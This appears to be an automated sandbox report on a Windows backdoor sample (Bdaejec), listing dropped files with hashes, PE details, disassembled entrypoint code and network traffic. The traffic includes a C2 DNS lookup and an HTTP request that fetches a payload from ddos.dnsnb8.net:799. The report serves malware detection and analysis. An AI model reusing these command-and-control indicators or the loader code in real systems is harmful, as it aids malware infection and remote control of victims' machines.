C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\lhwmJX.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2389504
Entropy (8bit):	6.731343079129651
Encrypted:	false
SSDEEP:	49152:BGSXoV72tpV9XE8Wwi1aCvYMdRluS/fYw44RxL:V4OEtwiICvYMpf
MD5:	3E995A1872E0B4EA0334F0C0570947DA
SHA1:	3CFC2C12329AE225307EF992BE0328FABD51A2B0
SHA-256:	FAFD7BB8D2C31D040BC085989459F45EF7C70B8F8111583ED79ADA2322CDDF55
SHA-512:	BF73801E7B7096E781C2E509891EF65CF62181F771EFF1C3329BA70DE54984C911A1629A5CCEFA14B05CF8D94B5992D995B743498507B0F128F33C432BE4165E
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ark.Ark.Ark...o.Mrk...h.Jrk...n.^rk...j.Erk.H...Brk.H...nrk.Arj..pk...b.rk...k.@rk.....@rk...i.@rk.RichArk.........................PE..L.....(c.....................~.......p$...........@...........................$...........@.........................p...<............@ ......................P#.....@...p...................P...........@............................................text...e........................... ..`.rdata...^.......`..................@..@.data...`....0......................@....rsrc........@ ....... .............@..@.reloc.......P#......"#.............@..B.....u...P...p$..B...4$............. ...........................................................................................................................................................................................................................................................

C:\Program Files\7-Zip\Uninstall.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\lhwmJX.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	31744
Entropy (8bit):	6.366381662938833
Encrypted:	false
SSDEEP:	768:uWQ3655Kv1X/qY1MSd3BQGPL4vzZq2o9W7GsxBbPr:uHqaNrFd3mGCq2iW7z
MD5:	D0A2FED6900F1E4B15FF8D044F2D48C6
SHA1:	22779304560CF2B40E910C6223DD192395AF7761
SHA-256:	A0C8C928252B0BC0E82171BADDAA9D846C670B397F072F414B48967EE78407CA
SHA-512:	BD3779B8A4835E5522B4CFCD995B856696DF381B5BE4FA4458CF4CE47581EDAAF82C137ABCBE33B06E8E179AF8FA6CAC44FF0BD71E4CB1C96258C2C745853981
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.6...X...X...X.x.R...X..V...X.x.\...X......X...Y.W.X......X.!.R...X...^...X.Rich..X.................PE..L...pN.d........../......V...@.......p.......0....@.........................................................................$9.......`...............................................................................0...............................text............................... ..`.rdata.......0......................@..@.data...X....@.......(..............@....rsrc........`.......*..............@..@.EpN.uZ..P...p...B...:.............. ...................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_lhwmJX.exe_2fd4019e8c5ecba5bd47e3021cb2b33c81855e_dafd7f56_cfb97327-de41-473e-9b7b-57a0563d5bae\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9898535710403806
Encrypted:	false
SSDEEP:	96:aMFAQwsxhnj7afzQXIDcQBDc6BU5cEscw3QtX+HbHg/5ksS/YyNl1zWzkMsIqLOZ:TqQwq0rm52Mt8jk/gmzuiFHZ24IO8FY
MD5:	C8B0703E22CB5C4E13997CE2B97013FA
SHA1:	4FA4A9EDBACF2686BFE2C159D6398FB8E7AAD0B5
SHA-256:	011F05F450380111FABE261E56E24009C5471341222C308071EBC73D01FEFE3E
SHA-512:	5CE5ECA9C202F0D5F841F730F3CB647DAADD0BDB2AE8E47B36DCDD1D3F11E6A1B8A985C048018DF340414724D4C52C795AF24B184B953AEB27A83047271819E7
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.8.5.8.7.6.1.8.3.7.2.9.4.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.8.5.8.7.6.2.3.9.9.7.8.7.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.f.b.9.7.3.2.7.-.d.e.4.1.-.4.7.3.e.-.9.b.7.b.-.5.7.a.0.5.6.3.d.5.b.a.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.8.a.7.b.5.b.7.-.9.f.a.b.-.4.9.7.6.-.b.6.d.0.-.c.c.b.3.0.e.6.0.e.1.e.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.h.w.m.J.X...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.a.4.-.0.0.0.1.-.0.0.1.4.-.8.5.d.8.-.9.6.4.3.1.b.5.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.2.5.d.a.5.d.5.e.3.8.2.0.b.1.9.4.2.7.7.a.f.7.8.d.a.b.5.b.0.3.3.c.0.0.0.0.f.f.f.f.!.0.0.0.0.9.9.e.e.3.1.c.d.4.b.0.d.6.a.4.b.6.2.7.7.9.d.a.3.6.e.0.e.e.e.c.d.d.8.0.5.8.9.f.c.!.l.h.w.m.J.X...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.1.3.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5128.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Sat Dec 28 11:26:02 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	150366
Entropy (8bit):	1.8749355834507835
Encrypted:	false
SSDEEP:	768:uXboe5QmdUxtGsG2jjG2+6G16lkBqpfJ/9/RfF/5fpVes+:uL0DJu2ZG16yqpfJ/9/RfF/5fpVes+
MD5:	CD040C44D6C9625017F3966EED7C94EC
SHA1:	B61CC7050B72D86AAF439C815A939821320A2E34
SHA-256:	D12892B025629FC63EC57A3533B343F527121EE49B690C0BE16C60CBBC89A353
SHA-512:	7C359FBD8F857064BEEE1BA82748882CD1CE6B4018F6555708B31D0F3DE268361274FB9A498FD64969004F668CA4EF373DA4D459C0BA596178998280C49A786F
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... .......J.og............D...............L...........lN..........T.......8...........T............;..v............ ..........."..............................................................................eJ......t#......GenuineIntel............T...........E.og.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5261.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6268
Entropy (8bit):	3.7233223519384895
Encrypted:	false
SSDEEP:	96:RSIU6o7wVetbsH6BqYWp0AUr0u5aMQUM89bPJnNsf39Jnm:R6l7wVeJsH68YWOrpDM89bRNsf37m
MD5:	019167492AA36061E511C3B29167B807
SHA1:	6AA32BF60D5409202B21B9478896C38A29663068
SHA-256:	43B4A8D04F16E2DCFFE5981F5CA9AA7AD13364B1864ECA7F9B7C1AA398A4AF7E
SHA-512:	EFE34DB4A1A2155E986E09CEEA52C65EA7E024CD8B986A757503350FD7BA9C4CFA7AF225464458E17EDB7E784E2A4F03279C191AECFDAAEA278DC1D19069A061
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.0.5.2.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5282.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4551
Entropy (8bit):	4.444973637391193
Encrypted:	false
SSDEEP:	48:cvIwWl8zssJg77aI9meSWpW8VYIYm8M4JMHFjUc+q8kAJmzCgk6Md:uIjfqI70ez7V8J0Uc2UCg1Md
MD5:	72D740B31AB3BCC52CA6002DA2E3977B
SHA1:	E901B7AA763FB9A42764ECB8D9BF34C60B88CA7E
SHA-256:	9DBCEBAF90DFC70145287A6F52DB3194C21742795D14E754BAD335290BABB549
SHA-512:	4EBBBB7BF9B82EC718148E211801D9688ADF5210465537315DFC2BACCBC45E8A3109DBB170EC3FE86B4F5B9F62CC5F0D5A5F0D596674E2A16FEB4B6423CADFF0
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="651028" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\k1[1].rar

Download File

Process:	C:\Users\user\AppData\Local\Temp\lhwmJX.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Temp\18FB2552.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\lhwmJX.exe
File Type:	ASCII text
Category:	modified
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Temp\lhwmJX.exe

Download File

Process:	C:\Users\user\Desktop\ArjM1qx3hV.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	15872
Entropy (8bit):	7.031113762428177
Encrypted:	false
SSDEEP:	384:7XZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:1QGPL4vzZq2o9W7GsxBbPr
MD5:	56B2C3810DBA2E939A8BB9FA36D3CF96
SHA1:	99EE31CD4B0D6A4B62779DA36E0EEECDD80589FC
SHA-256:	4354970CCC7CD6BB16318F132C34F6A1B3D5C2EA7FF53E1C9271905527F2DB07
SHA-512:	27812A9A034D7BD2CA73B337AE9E0B6DC79C38CFD1A2C6AC9D125D3CC8FA563C401A40D22155811D5054E5BAA8CF8C8E7E03925F25FA856A9BA9DEA708D15B4E
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 97%
Joe Sandbox View:	Filename: aRxo3E278B.exe, Detection: malicious, Browse Filename: yRc7UfFif9.exe, Detection: malicious, Browse Filename: gT6IitwToH.exe, Detection: malicious, Browse Filename: #U65b0#U7248#U7f51#U5173.exe, Detection: malicious, Browse Filename: #U8865#U4e01#U6253#U5305.exe, Detection: malicious, Browse Filename: #U65b0#U7248#U7f51#U5173Srv.exe, Detection: malicious, Browse Filename: gE4NVCZDRk.exe, Detection: malicious, Browse Filename: ib.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe, Detection: malicious, Browse Filename: 8VB4lVuZk3.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......z.I.>.'.>.'.>.'..7\.2.'...(.?.'.>.&.y.'.Q.#.=.'..).?.'.7...6.'.7...?.'.Rich>.'.................PE..L...JG.R.............................`.......0....@.......................................@..................................p...............................o.......................................................................................text.... ..........................`....rdata.......0......................@....data........@......................@....reloc.......P.......(..............@....aspack.. ...`.......,..............`....adata...............>..............@...................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Users\user\AppData\Local\Temp\lhwmJX.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.417095092518612
Encrypted:	false
SSDEEP:	6144:9cifpi6ceLPL9skLmb0moSWSPtaJG8nAgex285i2MMhA20X4WABlGuNO5+:Ki58oSWIZBk2MM6AFBoo
MD5:	787D98BA2A00C810CBC5B98177BC2C56
SHA1:	5BF864B86A766A75802391FD74D5F3F75C33DCE5
SHA-256:	13B435E6545196C323C4D6817FA0991C4964066362A0FB50B069D82A271F1E52
SHA-512:	052DD212CAC31E5A5D980581C4008647DCF51366E7A25558D949A2BB4628A024EC0FA2E2DB0077F1E4AF2B6D2CC2AEE62FD9C84377CCFA5538EF6CC4E5324917
Malicious:	false
Preview:	regfF...F....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.F.D.Y..............................................................................................................................................................................................................................................................................................................................................{..p........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

\Device\ConDrv

Download File

Process:	C:\Users\user\Desktop\ArjM1qx3hV.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	61
Entropy (8bit):	4.724021919949168
Encrypted:	false
SSDEEP:	3:RVAL2wO0naRRkxiMVZv:zbPcSRkHR
MD5:	4D947906BC153FDBB21240C1F4187F5C
SHA1:	D92D54040AC554897CBC796535BB53F193153CE1
SHA-256:	C556180C2AEFE01E639BC51E3791C416E7BCC0384A699D2E4BDA1A2EB992D234
SHA-512:	B84589CCE8A2B255F4319DA1DC069E08BC50CAC4D3C6459EAFA5B37313A6859A85694F0598D9E5C76DC0FF882614518505EEDFF5F01B1FCD82950FFAD5218F36
Malicious:	false
Preview:	Cannot open C:\Users\user\Desktop\ArjM1qx3hV-script.py..

Static File Info

General

File type:	PE32 executable (console) Intel 80386, for MS Windows
Entropy (8bit):	6.568590829740248
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	ArjM1qx3hV.exe
File size:	82'432 bytes
MD5:	3840cfa13afb95c493fc98d766946229
SHA1:	745322beeaaf28197f3949b5ee30929f827177e1
SHA256:	4feaa17c9b4a297a1fd51843a7f514d99c749a19bf46ab2968b48c6ccbd1d327
SHA512:	3b51d82d1d2d2cbd2b49f638d807cc677fdb2a723b835872ac270dd0cb54cdef155ad4f8181618c7ecadb7d0f9d1abfa79332d32f0da1e0495ccbfe41e1f8c59
SSDEEP:	1536:RfnLq01weW5yX3jFxv49Nu4GhQ6dGCq2iW7z:Y3ysTGhQiGCH
TLSH:	0D839E61B980C073C44A2076441DC7B19F7BBC312675D997BB960FBB5F313D1EA2A24A
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......YS.j.2.9.2.9.2.9:..9.2.9.2.9F2.9.}.9.2.9.`.992.9.`.9.2.9.`.9m2.9.`.9.2.9Rich.2.9................PE..L......Q...................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x414000
Entrypoint Section:	ltu
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x518BB0F8 [Thu May 9 14:21:44 2013 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	0f049ce24e217892c1b7f2d56270827d

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub esp, 0000016Ch
xor eax, eax
push ebx
push esi
push edi
mov dword ptr [ebp-24h], eax
mov dword ptr [ebp-10h], eax
mov dword ptr [ebp-14h], eax
mov dword ptr [ebp-08h], eax
mov dword ptr [ebp-0Ch], eax
mov dword ptr [ebp-20h], eax
mov dword ptr [ebp-18h], eax
mov dword ptr [ebp-48h], 6D77686Ch
mov dword ptr [ebp-44h], 652E584Ah
mov dword ptr [ebp-40h], 00006578h
mov dword ptr [ebp-3Ch], 00000000h
call 00007FC0A8AFFC65h
pop eax
add eax, 00000225h
mov dword ptr [ebp-04h], eax
mov eax, dword ptr fs:[00000030h]
mov dword ptr [ebp-28h], eax
mov eax, dword ptr [ebp-04h]
mov dword ptr [eax], E904C483h
mov eax, dword ptr [ebp-04h]
mov dword ptr [eax+04h], FFFEE376h
mov eax, dword ptr [ebp-28h]
mov eax, dword ptr [eax+0Ch]
mov eax, dword ptr [eax+1Ch]
mov eax, dword ptr [eax]
mov eax, dword ptr [eax+08h]
mov ecx, dword ptr [eax+3Ch]
mov ecx, dword ptr [ecx+eax+78h]
add ecx, eax
mov edi, dword ptr [ecx+1Ch]
mov ebx, dword ptr [ecx+20h]
mov esi, dword ptr [ecx+24h]
mov ecx, dword ptr [ecx+18h]
add esi, eax
add edi, eax
add ebx, eax
xor edx, edx
mov dword ptr [ebp-30h], esi
mov dword ptr [ebp-1Ch], edx
mov dword ptr [ebp-34h], ecx
cmp edx, dword ptr [ebp-34h]
jnc 00007FC0A8AFFDAEh
movzx ecx, word ptr [esi+edx*2]
mov edx, dword ptr [ebx+edx*4]
mov esi, dword ptr [edi+ecx*4]
add edx, eax
mov ecx, dword ptr [edx]
add esi, eax
cmp ecx, 4D746547h
jne 00007FC0A8AFFCB4h
cmp dword ptr [edx+04h], 6C75646Fh
jne 00007FC0A8AFFCABh

Rich Headers

Programming Language:

[IMP] VS2005 build 50727
[C++] VS2008 build 21022
[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xf92c	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xf488	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xe000	0x140	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xc95d	0xca00	aa49640fd565219199147ca08c770c9f	False	0.6125077351485149	data	6.611198890587402	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0xe000	0x2060	0x2200	e6a22fa467dcc8fa37fe596c800e97d3	False	0.349609375	OpenPGP Secret Key	5.292564857150331	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x11000	0x2bc4	0x1000	a778d492addf655755149a8778623a20	False	0.209228515625	data	2.2523233306733843	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
ltu	0x14000	0x5000	0x4200	feb9033b0b9614a9cff88ba9c5a53319	False	0.7771661931818182	data	6.933946275224043	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL

Import

KERNEL32.dll

GenerateConsoleCtrlEvent, GetExitCodeProcess, WaitForSingleObject, CreateProcessA, SetConsoleCtrlHandler, GetModuleFileNameA, EnterCriticalSection, LeaveCriticalSection, GetModuleHandleW, Sleep, GetProcAddress, ExitProcess, GetCommandLineA, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, DeleteCriticalSection, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetLastError, HeapFree, HeapAlloc, GetCPInfo, InterlockedIncrement, InterlockedDecrement, GetACP, GetOEMCP, IsValidCodePage, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, GetCurrentThreadId, WriteFile, LoadLibraryA, InitializeCriticalSectionAndSpinCount, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, HeapCreate, VirtualFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, RtlUnwind, HeapReAlloc, VirtualAlloc, GetConsoleCP, GetConsoleMode, FlushFileBuffers, LCMapStringA, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, SetFilePointer, HeapSize, CloseHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, SetStdHandle, CreateFileA, CompareStringA, CompareStringW, SetEnvironmentVariableA, ReadFile, SetEndOfFile, GetProcessHeap, GetFileAttributesA

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-28T12:25:58.540130+0100	2838522	ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup	1	192.168.2.7	65067	1.1.1.1	53	UDP
2024-12-28T12:25:59.786722+0100	2807908	ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin	1	192.168.2.7	49699	44.221.84.105	799	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 28, 2024 12:25:58.685000896 CET	49699	799	192.168.2.7	44.221.84.105
Dec 28, 2024 12:25:58.804615974 CET	799	49699	44.221.84.105	192.168.2.7
Dec 28, 2024 12:25:58.806278944 CET	49699	799	192.168.2.7	44.221.84.105
Dec 28, 2024 12:25:58.806461096 CET	49699	799	192.168.2.7	44.221.84.105
Dec 28, 2024 12:25:58.925986052 CET	799	49699	44.221.84.105	192.168.2.7
Dec 28, 2024 12:25:59.786653042 CET	799	49699	44.221.84.105	192.168.2.7
Dec 28, 2024 12:25:59.786721945 CET	49699	799	192.168.2.7	44.221.84.105
Dec 28, 2024 12:25:59.786751032 CET	799	49699	44.221.84.105	192.168.2.7
Dec 28, 2024 12:25:59.786806107 CET	49699	799	192.168.2.7	44.221.84.105
Dec 28, 2024 12:25:59.790950060 CET	49699	799	192.168.2.7	44.221.84.105
Dec 28, 2024 12:25:59.910603046 CET	799	49699	44.221.84.105	192.168.2.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 28, 2024 12:25:58.540129900 CET	65067	53	192.168.2.7	1.1.1.1
Dec 28, 2024 12:25:58.677571058 CET	53	65067	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 28, 2024 12:25:58.540129900 CET	192.168.2.7	1.1.1.1	0xeab3	Standard query (0)	ddos.dnsnb8.net	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 28, 2024 12:25:58.677571058 CET	1.1.1.1	192.168.2.7	0xeab3	No error (0)	ddos.dnsnb8.net		44.221.84.105	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

ddos.dnsnb8.net:799

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49699	44.221.84.105	799	6052	C:\Users\user\AppData\Local\Temp\lhwmJX.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 12:25:58.806461096 CET	288	OUT	GET /cj//k1.rar HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: ddos.dnsnb8.net:799 Connection: Keep-Alive

Target ID:	0
Start time:	06:25:56
Start date:	28/12/2024
Path:	C:\Users\user\Desktop\ArjM1qx3hV.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\ArjM1qx3hV.exe"
Imagebase:	0x400000
File size:	82'432 bytes
MD5 hash:	3840CFA13AFB95C493FC98D766946229
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	06:25:56
Start date:	28/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	06:25:57
Start date:	28/12/2024
Path:	C:\Users\user\AppData\Local\Temp\lhwmJX.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user~1\AppData\Local\Temp\lhwmJX.exe
Imagebase:	0xbc0000
File size:	15'872 bytes
MD5 hash:	56B2C3810DBA2E939A8BB9FA36D3CF96
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 97%, ReversingLabs
Reputation:	moderate
Has exited:	true

